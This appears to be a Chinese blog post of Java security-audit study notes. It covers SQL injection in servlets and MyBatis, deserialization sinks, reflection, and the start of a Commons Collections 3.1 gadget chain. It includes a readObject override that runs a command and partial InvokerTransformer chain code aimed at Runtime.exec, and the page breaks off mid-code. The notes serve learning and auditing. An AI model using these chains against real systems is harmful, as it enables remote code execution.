

<!DOCTYPE html>
<html lang="zh-CN" data-default-color-scheme=&#34;auto&#34;>



<head>
  <meta charset="UTF-8">
  <link rel="apple-touch-icon" sizes="76x76" href="/img/default.png">
  <link rel="icon" href="/img/default.png">
  <meta name="viewport"
        content="width=device-width, initial-scale=1.0, maximum-scale=1.0, user-scalable=no, shrink-to-fit=no">
  <meta http-equiv="x-ua-compatible" content="ie=edge">
  
  <meta name="theme-color" content="#2f4154">
  <meta name="description" content="">
  <meta name="author" content="KKfine&#39;s blog">
  <meta name="keywords" content="">
  
  <title>java审计1 - KKfine&#39;s blog</title>

  <link  rel="stylesheet" href="https://cdn.jsdelivr.net/npm/bootstrap@4.6.0/dist/css/bootstrap.min.css" />


  <link  rel="stylesheet" href="https://cdn.jsdelivr.net/npm/github-markdown-css@4.0.0/github-markdown.min.css" />
  <link  rel="stylesheet" href="/lib/hint/hint.min.css" />

  
    
    
      
      <link  rel="stylesheet" href="https://cdn.jsdelivr.net/npm/highlight.js@10.7.2/styles/atelier-estuary-light.min.css" />
    
  

  
    <link  rel="stylesheet" href="https://cdn.jsdelivr.net/npm/@fancyapps/fancybox@3.5.7/dist/jquery.fancybox.min.css" />
  



<!-- 主题依赖的图标库，不要自行修改 -->

<link rel="stylesheet" href="//at.alicdn.com/t/font_1749284_ba1fz6golrf.css">



<link rel="stylesheet" href="//at.alicdn.com/t/font_1736178_kmeydafke9r.css">


<link  rel="stylesheet" href="/css/main.css" />

<!-- 自定义样式保持在最底部 -->


  <script id="fluid-configs">
    var Fluid = window.Fluid || {};
    var CONFIG = {"hostname":"example.com","root":"/","version":"1.8.11","typing":{"enable":true,"typeSpeed":70,"cursorChar":"_","loop":false},"anchorjs":{"enable":true,"element":"h1,h2,h3,h4,h5,h6","placement":"right","visible":"hover","icon":""},"progressbar":{"enable":true,"height_px":3,"color":"#29d","options":{"showSpinner":false,"trickleSpeed":100}},"copy_btn":true,"image_zoom":{"enable":true,"img_url_replace":["",""]},"toc":{"enable":true,"headingSelector":"h1,h2,h3,h4,h5,h6","collapseDepth":0},"lazyload":{"enable":true,"loading_img":"/img/loading.gif","onlypost":false,"offset_factor":2},"web_analytics":{"enable":true,"baidu":null,"google":null,"gtag":null,"tencent":{"sid":null,"cid":null},"woyaola":null,"cnzz":null,"leancloud":{"app_id":null,"app_key":null,"server_url":null}},"search_path":"/local-search.xml"};
  </script>
  <script  src="/js/utils.js" ></script>
  <script  src="/js/color-schema.js" ></script>
<meta name="generator" content="Hexo 5.4.0"></head>


<body>
  <header style="height: 70vh;">
    <nav id="navbar" class="navbar fixed-top  navbar-expand-lg navbar-dark scrolling-navbar">
  <div class="container">
    <a class="navbar-brand"
       href="/">&nbsp;<strong>KKfine's blog</strong>&nbsp;</a>

    <button id="navbar-toggler-btn" class="navbar-toggler" type="button" data-toggle="collapse"
            data-target="#navbarSupportedContent"
            aria-controls="navbarSupportedContent" aria-expanded="false" aria-label="Toggle navigation">
      <div class="animated-icon"><span></span><span></span><span></span></div>
    </button>

    <!-- Collapsible content -->
    <div class="collapse navbar-collapse" id="navbarSupportedContent">
      <ul class="navbar-nav ml-auto text-center">
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/">
                <i class="iconfont icon-home-fill"></i>
                首页
              </a>
            </li>
          
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/archives/">
                <i class="iconfont icon-archive-fill"></i>
                归档
              </a>
            </li>
          
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/categories/">
                <i class="iconfont icon-category-fill"></i>
                分类
              </a>
            </li>
          
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/tags/">
                <i class="iconfont icon-tags-fill"></i>
                标签
              </a>
            </li>
          
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/about/">
                <i class="iconfont icon-user-fill"></i>
                关于
              </a>
            </li>
          
        
        
          <li class="nav-item" id="search-btn">
            <a class="nav-link" target="_self" data-toggle="modal" data-target="#modalSearch">&nbsp;<i
                class="iconfont icon-search"></i>&nbsp;</a>
          </li>
        
        
          <li class="nav-item" id="color-toggle-btn">
            <a class="nav-link" target="_self">&nbsp;<i
                class="iconfont icon-dark" id="color-toggle-icon"></i>&nbsp;</a>
          </li>
        
      </ul>
    </div>
  </div>
</nav>

    <div class="banner" id="banner" parallax=true
         style="background: url('/img/9.jpg') no-repeat center center;
           background-size: cover;">
      <div class="full-bg-img">
        <div class="mask flex-center" style="background-color: rgba(0, 0, 0, 0.3)">
          <div class="page-header text-center fade-in-up">
            <span class="h2" id="subtitle" title="java审计1">
              
            </span>

            
              <div class="mt-3">
  
  
    <span class="post-meta">
      <i class="iconfont icon-date-fill" aria-hidden="true"></i>
      <time datetime="2021-11-06 12:46" pubdate>
        2021年11月6日 下午
      </time>
    </span>
  
</div>

<div class="mt-1">
  
    
    <span class="post-meta mr-2">
      <i class="iconfont icon-chart"></i>
      4k 字
    </span>
  

  
    
    <span class="post-meta mr-2">
      <i class="iconfont icon-clock-fill"></i>
      
      
      54
       分钟
    </span>
  

  
  
</div>

            
          </div>

          
        </div>
      </div>
    </div>
  </header>

  <main>
    
      

<div class="container-fluid nopadding-x">
  <div class="row nomargin-x">
    <div class="d-none d-lg-block col-lg-2"></div>
    <div class="col-lg-8 nopadding-x-md">
      <div class="container nopadding-x-md" id="board-ctn">
        <div class="py-5" id="board">
          <article class="post-content mx-auto">
            <!-- SEO header -->
            <h1 style="display: none">java审计1</h1>
            
            <div class="markdown-body">
              <p>参考：</p>
<p><a target="_blank" rel="noopener" href="https://xz.aliyun.com/t/7945#toc-27">https://xz.aliyun.com/t/7945#toc-27</a></p>
<p><a target="_blank" rel="noopener" href="https://www.cnblogs.com/liudaihuablogs/p/14167448.html">https://www.cnblogs.com/liudaihuablogs/p/14167448.html</a></p>
<p>java初学是真滴难受，网上一些反序列化都直接从cc库开始无语，硬着头皮看吧</p>
<h1 id="sql注入漏洞"><a href="#sql注入漏洞" class="headerlink" title="sql注入漏洞"></a>sql注入漏洞</h1><p>可参考<a target="_blank" rel="noopener" href="https://b1ngz.github.io/java-sql-injection-note/">https://b1ngz.github.io/java-sql-injection-note/</a></p>
<ol>
<li><p><strong>直接拼接，未进行过滤</strong></p>
<p>将<code>request.getParameter(&quot;&quot;)</code>直接放在SQL语句。</p>
<p>全局搜索查看：<code>String sql</code>等。</p>
</li>
</ol>
<p><img src="https://img-blog.csdnimg.cn/64300da5efe04ed4852c4683d714c2f2.png?x-oss-process=image/watermark,type_ZHJvaWRzYW5zZmFsbGJhY2s,shadow_50,text_Q1NETiBAS0tmaW5lXw==,size_20,color_FFFFFF,t_70,g_se,x_16" srcset="/img/loading.gif" lazyload alt="在这里插入图片描述"></p>
<figure class="highlight java"><table><tr><td class="gutter hljs"><div class="hljs code-wrapper"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br></pre></div></td><td class="code"><div class="hljs code-wrapper"><pre><code class="hljs java"><span class="hljs-function"><span class="hljs-keyword">protected</span> <span class="hljs-keyword">void</span> <span class="hljs-title">doGet</span><span class="hljs-params">(HttpServletRequest req, HttpServletResponse resp)</span> <span class="hljs-keyword">throws</span> ServletException, IOException </span>&#123;<br>        resp.setContentType(<span class="hljs-string">&quot;text/html;charset=UTF-8&quot;</span>);<br>        PrintWriter out = resp.getWriter();<br>        Enumeration parameterNames=req.getParameterNames();<br>        System.out.println(parameterNames);<br>        <span class="hljs-keyword">while</span> (parameterNames.hasMoreElements())&#123;<br>            String t = (String) parameterNames.nextElement();<br>            <span class="hljs-keyword">if</span>(t.equals(<span class="hljs-string">&quot;username&quot;</span>))&#123;<br>                useranme = req.getParameter(t).trim();<br>                out.write(<span class="hljs-string">&quot;&lt;p1&gt;&quot;</span> + <span class="hljs-string">&quot;username:&quot;</span> + useranme + <span class="hljs-string">&quot;&lt;/p1&gt;&quot;</span>);<br>            &#125;<span class="hljs-keyword">else</span> <span class="hljs-keyword">if</span> (t.equals(<span class="hljs-string">&quot;password&quot;</span>))&#123;<br>                password = req.getParameter(t).trim();<br>                out.write(<span class="hljs-string">&quot;&lt;p1&gt;&quot;</span> + <span class="hljs-string">&quot;password:&quot;</span> + password + <span class="hljs-string">&quot;&lt;/p1&gt;&quot;</span>);<br>            &#125;<span class="hljs-keyword">else</span> &#123;<br>                out.write(<span class="hljs-string">&quot;only user pass&quot;</span>);<br>                <span class="hljs-keyword">break</span>;<br>            &#125;<br>        &#125;<br><span class="hljs-comment">//        System.out.println(param);</span><br>        <span class="hljs-keyword">try</span> &#123;<br>            login(useranme,password);<br>        &#125; <span class="hljs-keyword">catch</span> (ClassNotFoundException e) &#123;<br>            e.printStackTrace();<br>        &#125; <span class="hljs-keyword">catch</span> (SQLException e) &#123;<br>            e.printStackTrace();<br>        &#125;<br>    &#125;<br></code></pre></div></td></tr></table></figure>

<ol>
<li><p><strong>%和_</strong></p>
<p>没有手动过滤%。预编译是不能处理这个符号的， 所以需要手动过滤，否则会造成慢查询，造成 dos。</p>
</li>
<li><p><strong>Order by、from等无法预编译</strong></p>
<p>如以下示例，需要手动过滤，否则存在sql注入。</p>
<p><code>String sql = &quot;Select * from news where title =?&quot; + &quot;order by &#39;&quot; + time + &quot;&#39; asc&quot;</code></p>
</li>
<li><p><strong>Mybatis 框架</strong></p>
<p>使用注解或者xml将java对象与数据库sql操作对应。</p>
<p>在注解中或者 Mybatis 相关的配置文件中搜索 $ 。然后查看相关 sql 语句上下文环境。</p>
<p><strong>mybatis简单示例</strong></p>
<ul>
<li>mybatis的maven配置</li>
</ul>
<figure class="highlight xml"><table><tr><td class="gutter hljs"><div class="hljs code-wrapper"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></div></td><td class="code"><div class="hljs code-wrapper"><pre><code class="hljs xml"><span class="hljs-tag">&lt;<span class="hljs-name">dependency</span>&gt;</span><br>    <span class="hljs-tag">&lt;<span class="hljs-name">groupId</span>&gt;</span>org.mybatis<span class="hljs-tag">&lt;/<span class="hljs-name">groupId</span>&gt;</span><br>    <span class="hljs-tag">&lt;<span class="hljs-name">artifactId</span>&gt;</span>mybatis<span class="hljs-tag">&lt;/<span class="hljs-name">artifactId</span>&gt;</span><br>    <span class="hljs-tag">&lt;<span class="hljs-name">version</span>&gt;</span>3.5.2<span class="hljs-tag">&lt;/<span class="hljs-name">version</span>&gt;</span><br><span class="hljs-tag">&lt;/<span class="hljs-name">dependency</span>&gt;</span><br></code></pre></div></td></tr></table></figure></li>
</ol>
<h1 id="反序列化漏洞"><a href="#反序列化漏洞" class="headerlink" title="反序列化漏洞"></a>反序列化漏洞</h1><p>可参考</p>
<p><a target="_blank" rel="noopener" href="https://xz.aliyun.com/t/2041">https://xz.aliyun.com/t/2041</a></p>
<p><a target="_blank" rel="noopener" href="https://xz.aliyun.com/t/7031">https://xz.aliyun.com/t/7031</a></p>
<p>首先，一个类的对象要想序列化成功，必须满足两个条件：</p>
<ol>
<li>该类必须实现 java.io.Serializable 接口。</li>
<li>该类的所有属性必须是可序列化的。如果有一个属性不是可序列化的，则该属性必须注明是短暂的。</li>
</ol>
<p>在Java反序列化中，会调用被反序列化的readObject方法，当readObject方法书写不当时就会引发漏洞。</p>
<p>一个简单得样例，通过重写readObject方法，在其中执行命令达到触发漏洞效果。</p>
<figure class="highlight java"><table><tr><td class="gutter hljs"><div class="hljs code-wrapper"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br></pre></div></td><td class="code"><div class="hljs code-wrapper"><pre><code class="hljs java"><span class="hljs-keyword">package</span> serialize;<br><br><span class="hljs-keyword">import</span> java.io.*;<br><span class="hljs-keyword">import</span> java.util.Scanner;<br><br><span class="hljs-keyword">public</span> <span class="hljs-class"><span class="hljs-keyword">class</span> <span class="hljs-title">test1</span> </span>&#123;<br>    <span class="hljs-function"><span class="hljs-keyword">public</span> <span class="hljs-keyword">static</span> <span class="hljs-keyword">void</span> <span class="hljs-title">main</span><span class="hljs-params">(String[] args)</span> <span class="hljs-keyword">throws</span> IOException, ClassNotFoundException </span>&#123;<br>        <span class="hljs-comment">//读取输入流,并转换对象</span><br><span class="hljs-comment">//        Scanner input = new Scanner(System.in);</span><br><span class="hljs-comment">//        InputStream in= request.getInputStream();</span><br><span class="hljs-comment">//        ObjectInputStream ois = new ObjectInputStream(in); //恢复对象</span><br><span class="hljs-comment">//        ois.readObject();</span><br><span class="hljs-comment">//        ois.close();</span><br>        SerialObject s = <span class="hljs-keyword">new</span> SerialObject(<span class="hljs-number">12</span>,<span class="hljs-string">&quot;KKfine&quot;</span>);<br>        FileOutputStream fileOut = <span class="hljs-keyword">new</span> FileOutputStream(<span class="hljs-string">&quot;./ test.ser&quot;</span>);<br>        ObjectOutputStream out = <span class="hljs-keyword">new</span> ObjectOutputStream(fileOut);<br>        out.writeObject(s);<br>        fileOut.close();<br>        System.out.println(<span class="hljs-string">&quot;serialize ok &quot;</span>);<br><br>        SerialObject p = <span class="hljs-keyword">null</span>;<br>        FileInputStream filein = <span class="hljs-keyword">new</span> FileInputStream(<span class="hljs-string">&quot;./test.ser&quot;</span>);<br>        ObjectInputStream in = <span class="hljs-keyword">new</span> ObjectInputStream(filein);<br>        p = (SerialObject) in.readObject();<br>        in.close();<br>        filein.close();<br>    &#125;<br>&#125;<br><span class="hljs-class"><span class="hljs-keyword">class</span> <span class="hljs-title">SerialObject</span> <span class="hljs-keyword">implements</span> <span class="hljs-title">Serializable</span></span>&#123;<br>    <span class="hljs-keyword">private</span> <span class="hljs-keyword">static</span> <span class="hljs-keyword">final</span> <span class="hljs-keyword">long</span> seriaverionuid = <span class="hljs-number">513134543743755L</span>;<br>    <span class="hljs-keyword">private</span> <span class="hljs-keyword">int</span> id;<br>    <span class="hljs-keyword">public</span> String name;<br>    <span class="hljs-function"><span class="hljs-keyword">public</span> <span class="hljs-title">SerialObject</span><span class="hljs-params">(<span class="hljs-keyword">int</span> id,String name)</span></span>&#123;<br>        <span class="hljs-keyword">this</span>.id = id;<br>        <span class="hljs-keyword">this</span>.name = name;<br>    &#125;<br>    <span class="hljs-function"><span class="hljs-keyword">private</span> <span class="hljs-keyword">void</span> <span class="hljs-title">readObject</span><span class="hljs-params">(java.io.ObjectInputStream in)</span><span class="hljs-keyword">throws</span> IOException,ClassNotFoundException</span>&#123;<br>        in.defaultReadObject();<br>        Runtime.getRuntime().exec(<span class="hljs-string">&quot;notepad.exe&quot;</span>);<br>    &#125;<br>&#125;<br><br></code></pre></div></td></tr></table></figure>

<p>序列化数据通常以<code>AC ED</code>开始，之后的两个字节是版本号，版本号一般是<code>00 05</code>但在某些情况下可能是更高的数字。</p>
<p>Java类名称可能会以“L”开头的替代格式出现 ，以’;’结尾 ，并使用正斜杠来分隔命名空间和类名（例如 “Ljava / rmi / dgc / VMID;”）。除了Java类名，由于序列化格式规范的约定，还有一些其他常见的字符串，例如 ：表示对象（TC_OBJECT），后跟其类描述（TC_CLASSDESC）的’sr’或 可能表示没有超类（TC_NULL）的类的类注释（TC_ENDBLOCKDATA）的’xp’。</p>
<p>序列化数据信息是将对象信息按照一定规则组成的，那我们根据这个规则也可以逆向推测出数据信息中的数据类型等信息。并且有大牛写好了现成的工具-<a target="_blank" rel="noopener" href="https://github.com/NickstaDB/SerializationDumper">SerializationDumper</a></p>
<p>在实战过程中，我们可以通过tcpdump抓取TCP/HTTP请求，通过<a target="_blank" rel="noopener" href="https://github.com/NickstaDB/SerialBrute/">SerialBrute.py</a>去自动化检测，并插入ysoserial生成的exp</p>
<p><img src="https://img-blog.csdnimg.cn/13cdbe6f5635452ebd0122ef527efa9a.png?x-oss-process=image/watermark,type_ZHJvaWRzYW5zZmFsbGJhY2s,shadow_50,text_Q1NETiBAS0tmaW5lXw==,size_20,color_FFFFFF,t_70,g_se,x_16" srcset="/img/loading.gif" lazyload alt="在这里插入图片描述"></p>
<p>感觉主要是要注意一些库中存在得反序列化漏洞。</p>
<p>注意找出反序列化函数调用点：</p>
<ul>
<li>ObjectInputStream.readObject</li>
<li>ObjectInputStream.readUnshared</li>
<li>XMLDecoder.readObject</li>
<li>yaml.load</li>
<li>XStream.fromXML</li>
<li>ObjectMapper.readValue</li>
<li>JSON.parseObject</li>
</ul>
<h2 id="关于java反射"><a href="#关于java反射" class="headerlink" title="关于java反射"></a>关于java反射</h2><p>参考<a target="_blank" rel="noopener" href="https://www.liaoxuefeng.com/wiki/1252599548343744/1264799402020448">https://www.liaoxuefeng.com/wiki/1252599548343744/1264799402020448</a></p>
<p>反射就是Reflection，Java的反射是指程序在运行期可以拿到一个对象的所有信息。</p>
<p>正常情况下，如果我们要调用一个对象的方法，或者访问一个对象的字段，通常会传入对象实例：</p>
<figure class="highlight typescript"><table><tr><td class="gutter hljs"><div class="hljs code-wrapper"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br></pre></div></td><td class="code"><div class="hljs code-wrapper"><pre><code class="hljs typescript"><span class="hljs-comment">// Main.java</span><br><span class="hljs-keyword">import</span> com.itranswarp.learnjava.Person;<br><br><span class="hljs-keyword">public</span> <span class="hljs-class"><span class="hljs-keyword">class</span> <span class="hljs-title">Main</span> </span>&#123;<br>    <span class="hljs-built_in">String</span> <span class="hljs-function"><span class="hljs-title">getFullName</span>(<span class="hljs-params">Person p</span>)</span> &#123;<br>        <span class="hljs-keyword">return</span> p.getFirstName() + <span class="hljs-string">&quot; &quot;</span> + p.getLastName();<br>    &#125;<br>&#125;<br></code></pre></div></td></tr></table></figure>

<p>但是，如果不能获得<code>Person</code>类，只有一个<code>Object</code>实例，比如这样：</p>
<figure class="highlight javascript"><table><tr><td class="gutter hljs"><div class="hljs code-wrapper"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></div></td><td class="code"><div class="hljs code-wrapper"><pre><code class="hljs javascript"><span class="hljs-built_in">String</span> <span class="hljs-function"><span class="hljs-title">getFullName</span>(<span class="hljs-params"><span class="hljs-built_in">Object</span> obj</span>)</span> &#123;<br>    <span class="hljs-keyword">return</span> ???<br>&#125;<br></code></pre></div></td></tr></table></figure>

<p>怎么办？有童鞋会说：强制转型啊！</p>
<figure class="highlight javascript"><table><tr><td class="gutter hljs"><div class="hljs code-wrapper"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></div></td><td class="code"><div class="hljs code-wrapper"><pre><code class="hljs javascript"><span class="hljs-built_in">String</span> <span class="hljs-function"><span class="hljs-title">getFullName</span>(<span class="hljs-params"><span class="hljs-built_in">Object</span> obj</span>)</span> &#123;<br>    Person p = (Person) obj;<br>    <span class="hljs-keyword">return</span> p.getFirstName() + <span class="hljs-string">&quot; &quot;</span> + p.getLastName();<br>&#125;<br></code></pre></div></td></tr></table></figure>

<p>强制转型的时候，你会发现一个问题：编译上面的代码，仍然需要引用<code>Person</code>类。不然，去掉<code>import</code>语句，你看能不能编译通过？</p>
<p>所以，反射是为了解决在运行期，对某个实例一无所知的情况下，如何调用其方法。</p>
<p>关于反射的实例化一些方法</p>
<p><code>forName </code></p>
<p> forName是一个静态方法，其作用：通过调用来获取类名对应的Class对象，同时将Class对象加载进来。</p>
<p><code>newInstance</code></p>
<p>将对象实例化。返回类型为Object。与new的区别在于，new可以带参，而newInstance（）不可以，一边初始化无参类。通常与forName()配合使用。</p>
<figure class="highlight java"><table><tr><td class="gutter hljs"><div class="hljs code-wrapper"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></div></td><td class="code"><div class="hljs code-wrapper"><pre><code class="hljs java">String str = <span class="hljs-string">&quot;java.util.Date&quot;</span>;<br>Class cl1= Class.forName(str);<span class="hljs-comment">//加载java.util.Date类</span><br>Object obj = cl1.newInstance();<span class="hljs-comment">//实例化cl1</span><br></code></pre></div></td></tr></table></figure>

<p>最后一个是直接用new 来实例化也是很常用的方法。</p>
<p>还有一些关键的方法</p>
<p><code>getMethod()</code>  Method getMethod(String name,Class…parameterTypes)</p>
<p>getMethod方法与getField方法类似，getField方法根据表示域名的字符串，返回一个Field对象。而getMethod方法则根据方法名称和相关参数，来定位需要查找的Method对象并返回。</p>
<p>getMethod与getDeclareMethods方法的区别在于，后者返回一个Method对象数组，需要自己在结果中查找所需Method对象。</p>
<p><code>invoke</code>Object invoke（Object obj,Object…args）obj：实例化后的对象,args：用于方法调用的参数</p>
<p>调用包装在当前Method对象中的方法</p>
<p>常用的还有<strong>java.lang.Class.getMethod（）</strong></p>
<h2 id="反序列化一般攻击过程"><a href="#反序列化一般攻击过程" class="headerlink" title="反序列化一般攻击过程"></a>反序列化一般攻击过程</h2><p>在开始之前我们需要理一下反序列化漏洞的攻击流程：</p>
<ol>
<li>客户端构造payload(有效载荷)，并进行一层层的封装，完成最后的exp（exploit-利用代码）</li>
<li>exp发送到服务端，进入一个服务端自主复写（也可能是也有组件复写）的readobject函数，它会反序列化恢复我们构造的exp去形成一个恶意的数据格式exp_1（剥去第一层）</li>
<li>这个恶意数据exp_1在接下来的处理流程(可能是在自主复写的readobject中、也可能是在外面的逻辑中)，会执行一个exp_1这个恶意数据类的一个方法，在方法中会根据exp_1的内容进行函处理，从而一层层地剥去（或者说变形、解析）我们exp_1变成exp_2、exp_3……</li>
<li>最后在一个可执行任意命令的函数中执行最后的payload，完成远程代码执行。</li>
</ol>
<p>那么以上大概可以分成三个主要部分：</p>
<ol>
<li>payload：需要让服务端执行的语句：比如说弹计算器还是执行远程访问等；我把它称为：payload</li>
<li>反序列化利用链：服务端中存在的反序列化利用链，会一层层拨开我们的exp，最后执行payload。(在此篇中就是commons-collections利用链)</li>
<li>readObject复写利用点：服务端中存在的可以与我们漏洞链相接的并且可以从外部访问的readObject函数复写点；我把它称为readObject复写利用点（自创名称…</li>
</ol>
<h2 id="初试CC3-1反序列化漏洞"><a href="#初试CC3-1反序列化漏洞" class="headerlink" title="初试CC3.1反序列化漏洞"></a>初试CC3.1反序列化漏洞</h2><p>看cc库漏洞之前得先了解了解cc库得一下接口和函数得实现。</p>
<p>这里Map类是存储键值对的数据结构，Apache Commons Collections中实现了类TransformedMap，用来对Map进行某种变换，只要调用decorate()函数，传入key和value的变换函数Transformer，即可从任意Map对象生成相应的TransformedMap，decorate()函数如下</p>
<p><img src="https://img-blog.csdnimg.cn/a5cc0eca263b485c8521ffece0db2b6d.png" srcset="/img/loading.gif" lazyload alt="在这里插入图片描述"></p>
<p>Transformer是一个接口，其中定义的transform()函数用来将一个对象转换成另一个对象。如下所示：</p>
<figure class="highlight java"><table><tr><td class="gutter hljs"><div class="hljs code-wrapper"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></div></td><td class="code"><div class="hljs code-wrapper"><pre><code class="hljs java"><span class="hljs-keyword">public</span> <span class="hljs-class"><span class="hljs-keyword">interface</span> <span class="hljs-title">Transformer</span> </span>&#123;  <br><br> <span class="hljs-function"><span class="hljs-keyword">public</span> Object <span class="hljs-title">transform</span><span class="hljs-params">(Object input)</span></span>;  <br><br>&#125; <br></code></pre></div></td></tr></table></figure>

<p>当Map中的任意项的Key或者Value被修改，相应的Transformer就会被调用。除此以外，多个Transformer还能串起来，形成ChainedTransformer。</p>
<p>Apache Commons Collections中已经实现了一些常见的Transformer，其中有一个可以通过调用Java的反射机制来调用任意函数，叫做InvokerTransformer。这也是这个漏洞触发得核心。看一下InvokerTransformer的源码定义</p>
<h3 id="poc链分析"><a href="#poc链分析" class="headerlink" title="poc链分析"></a>poc链分析</h3><h4 id="JDK1-7利用链"><a href="#JDK1-7利用链" class="headerlink" title="JDK1.7利用链"></a>JDK1.7利用链</h4><p>先看一下核心得触发漏洞得地方</p>
<p><img src="https://img-blog.csdnimg.cn/9414e8841c984f0fbb589605d577b0e0.png?x-oss-process=image/watermark,type_ZHJvaWRzYW5zZmFsbGJhY2s,shadow_50,text_Q1NETiBAS0tmaW5lXw==,size_20,color_FFFFFF,t_70,g_se,x_16" srcset="/img/loading.gif" lazyload alt="在这里插入图片描述"></p>
<p>这里得三个参数都是我们可控的，可以看到 InvokerTransformer 类中实现的 transform() 接口使用 Java 反射机制获取反射对象 input 中的参数类型为 iParamTypes 的方法 iMethodName，然后使用对应参数 iArgs 调用获取的方法，并将执行结果返回。由于其实现了 Serializable 接口，因此其中的三个必要参数 iMethodName、iParamTypes 和 iArgs 都是可以通过序列化直接构造的，为命令执行创造的决定性的条件。</p>
<p>然后要想利用 InvokerTransformer 类中的 transform() 来达到任意命令执行，还需要一个入口点，使得应用在反序列化的时候能够通过一条调用链来触发 InvokerTransformer 中的 transform() 接口。这里寻找过后发现了<code>TransformedMap</code>下存在<code>put</code>方法</p>
<p><img src="https://img-blog.csdnimg.cn/998ab566576542a4ac33ac4fd1a22d22.png" srcset="/img/loading.gif" lazyload alt="在这里插入图片描述"></p>
<p>跟进后可以发现这里存在调用transform函数只需要将成员变量里的一个<code>valuetransformer</code>设置为一个<code>InvokerTransformer</code>类即可触发</p>
<p><img src="C:\Users\86130\AppData\Roaming\Typora\typora-user-images\image-20211106222354207.png" srcset="/img/loading.gif" lazyload alt="image-20211106222354207"></p>
<p>还有一些细节的东西，这里直接看pop链。这里为了最后能够获得<code>exec</code>函数执行命令，需要调用多次反射，所以需要将多个 InvokerTransformer 实例级联在一起组成一个 ChainedTransformer 对象，在其调用的时候会进行一个级联 transform() 调用：</p>
<figure class="highlight java"><table><tr><td class="gutter hljs"><div class="hljs code-wrapper"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br></pre></div></td><td class="code"><div class="hljs code-wrapper"><pre><code class="hljs java"><span class="hljs-keyword">package</span> CC3_1.serialize;<br><br><span class="hljs-keyword">import</span> org.apache.commons.collections.*;<br><span class="hljs-keyword">import</span> org.apache.commons.collections.functors.ChainedTransformer;<br><span class="hljs-keyword">import</span> org.apache.commons.collections.functors.ConstantTransformer;<br><span class="hljs-keyword">import</span> org.apache.commons.collections.functors.InvokerTransformer;<br><span class="hljs-keyword">import</span> org.apache.commons.collections.map.TransformedMap;<br><br><span class="hljs-keyword">import</span> java.util.HashMap;<br><span class="hljs-keyword">import</span> java.util.Map;<br><br><span class="hljs-keyword">public</span> <span class="hljs-class"><span class="hljs-keyword">class</span> <span class="hljs-title">commons_collections_3_1</span> </span>&#123;<br>    <span class="hljs-function"><span class="hljs-keyword">public</span> <span class="hljs-keyword">static</span> <span class="hljs-keyword">void</span> <span class="hljs-title">main</span><span class="hljs-params">(String[] args)</span> </span>&#123;<br>        Transformer[] test = <span class="hljs-keyword">new</span> Transformer[] &#123;<br>                <span class="hljs-keyword">new</span> ConstantTransformer(Runtime.class),<br>                <span class="hljs-keyword">new</span> InvokerTransformer(<br>                        <span class="hljs-string">&quot;getMethod&quot;</span>,<br>                        <span class="hljs-keyword">new</span> Class[]&#123;String.class,Class[].class&#125;,<br>                        <span class="hljs-keyword">new</span> Object[]&#123;<span class="hljs-string">&quot;getRuntime&quot;</span>,<span class="hljs-keyword">new</span> Class[<span class="hljs-number">0</span>]&#125;<br>                ),<br>                <span class="hljs-keyword">new</span> InvokerTransformer(<br>                        <span class="hljs-string">&quot;invoke&quot;</span>,<br>                        <span class="hljs-keyword">new</span> Class[]&#123;Object.class,Object[].class&#125;,<br>                        <span class="hljs-keyword">new</span> Object[]&#123;<span class="hljs-keyword">null</span>,<span class="hljs-keyword">new</span> Object[<span 